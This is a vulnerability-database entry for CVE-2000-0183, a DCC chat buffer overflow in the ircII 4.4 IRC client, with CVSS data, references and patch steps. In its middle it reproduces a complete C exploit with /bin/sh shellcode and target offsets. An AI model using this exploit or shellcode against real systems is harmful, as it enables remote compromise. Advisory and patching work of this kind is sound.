CVE-2000-0183
CVSS5.1
Published: 2000-03-10 00:00:00
Revised: 2008-09-10 15:03:15
NMCOE    

[Original] Buffer overflow in ircII 4.4 IRC client allows remote attackers to execute commands via the DCC chat capability.


[CNNVD] IrcII DCC Chat buffer overflow vulnerability (CNNVD-200003-020)

        The ircII 4.4 IRC client contains a buffer overflow vulnerability. A remote attacker can execute commands by way of the DCC chat feature.

- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0183
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0183
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200003-020
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1046
(UNKNOWN)  BID  1046
http://www.redhat.com/support/errata/RHSA-2000-008.html
(UNKNOWN)  REDHAT  RHSA-2000:008
http://archives.neohapsis.com/archives/bugtraq/2000-03/0093.html
(UNKNOWN)  BUGTRAQ  20000310 Fwd: ircii-4.4 buffer overflow

- Vulnerability information

IrcII DCC Chat buffer overflow vulnerability
Medium severity  Buffer overflow
2000-03-10 00:00:00 2005-05-02 00:00:00
Remote ※ Local
        The ircII 4.4 IRC client contains a buffer overflow vulnerability. A remote attacker can execute commands by way of the DCC chat feature.

- Advisories and patches

        bladi suggested upgrading to IrcII version 4.4M in his post to BugTraq on March 10, 2000.
        A fix was made available for the FreeBSD port of IrcII 4.4. From the advisory:
        1) Upgrade your entire ports collection and rebuild the ircII port.
        2) Reinstall a new package dated after the correction date, obtained from:
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/irc/ircII-4.4S.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-3-stable/irc/ircII-4.4S.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/irc/ircII-4.4S.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/irc/ircII-4.4S.tgz
        3) download a new port skeleton for the ircII port from:
        http://www.freebsd.org/ports/
        and use it to rebuild the port.
        4) Use the portcheckout utility to automate option (3) above. The
        portcheckout port is available in /usr/ports/devel/portcheckout or the
        package can be obtained from:
        ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/devel/portcheckout-1.0.tgz
        Michael Sandrof IrcII 4.4 -7

- Vulnerability information (19801)

Michael Sandrof IrcII 4.4 -7 Buffer Overflow Vulnerability (EDBID:19801)
linux remote
2000-03-10 Verified
0 bladi
N/A [download]
source: http://www.securityfocus.com/bid/1046/info

IrcII is a well-known Internet Relay Chat (IRC) client for unix. Version 4.4-7 and possibly previous versions are known to be vulnerable to a buffer overflow condition in their direct client-to-client (DCC) chat implementation. It may be possible to execute arbitrary code on a client attempting to initiate a DCC chat. Exploitation of this vulnerability could result in a remote compromise with the privileges of the user running the ircII client.

This vulnerability was present in the "port" made available with FreeBSD. It is not installed by default.


/*

  ircii-4.4 exploit by bladi & aLmUDeNa

  buffer overflow in ircii dcc chat's
  allow to execute arbitrary

  Affected:
           ircII-4.4

  Patch:
         Upgrade to ircII-4.4M
  ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz

  Offset:
         SuSe 6.x :0xbfffe3ff
         RedHat   :0xbfffe888

  Thanks to : #warinhell,#hacker_novatos
  Special thanks go to: Topo[lb],
	Greetings to everyone who knows us, especially eva ;)
                                         (bladi@euskalnet.net)
*/

#include <stdio.h>
#include <stdlib.h>       /* exit(), atoi() */
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>    /* inet_ntoa(), inet_addr() */

/* Resolve a hostname to its dotted-quad address string. */
char *h_to_ip(char *hostname) {
  struct hostent *hozt;
  struct sockaddr_in tmp;
  struct in_addr in;
  if ((hozt=gethostbyname(hostname))==NULL)
      {
      printf(" ERROR: IP incorrecta\n");
      exit(0);
      }
  memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
  memcpy(&in,&tmp.sin_addr.s_addr,4);
  return(inet_ntoa(in));
}

int main(int argc, char *argv[])
{
  struct sockaddr_in sin;
  char *hostname;
  char nops[] =
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  char *shell =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  int outsocket,i;
printf (" irciismash  ver: 1.0\n");
printf ("         by         \n");
printf ("  bladi & aLmUDeNa\n\n");

if (argc<3)
    {
    printf("Usage : %s hostname port\n",argv[0]);
    exit(-1);
    }
hostname=argv[1];
outsocket=socket(AF_INET,SOCK_STREAM,0);
sin.sin_family=AF_INET;
sin.sin_port=htons(atoi(argv[2]));
sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) {
printf(" ERROR: El puerto esta cerradito :_(\n");
exit(0);
}
    printf("[1]- Noping\n    [");
    for(i=0;i<47;i++)
        {
        if (!(i % 7)) { usleep (9); printf("."); fflush(stdout); }
        write(outsocket,nops,strlen(nops));
        }
    printf("]\n");
    printf("     Noped\n");
    printf("[2]- Injectin shellcode\n");
    write(outsocket,shell,strlen(shell));
    usleep(999);
    printf("     Injected\n");
    printf("[3]- Waiting\n [");
    for(i=0;i<299;i++)
        {
        printf(".");
        fflush(stdout);
        usleep(99);
        write(outsocket,"\xff",strlen("\xff"));
        write(outsocket,"\xbf",strlen("\xff"));
        write(outsocket,"\xff",strlen("\xe9"));
        write(outsocket,"\xe3",strlen("\xff"));
        }
printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");
close(outsocket);
return 0;
}

- Vulnerability information

1252
ircII DCC Chat Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade, Third-Party Solution
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-02-07 Unknown
Unknown Unknown

- Solution

Upgrade to version 4.4 M or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's related websites.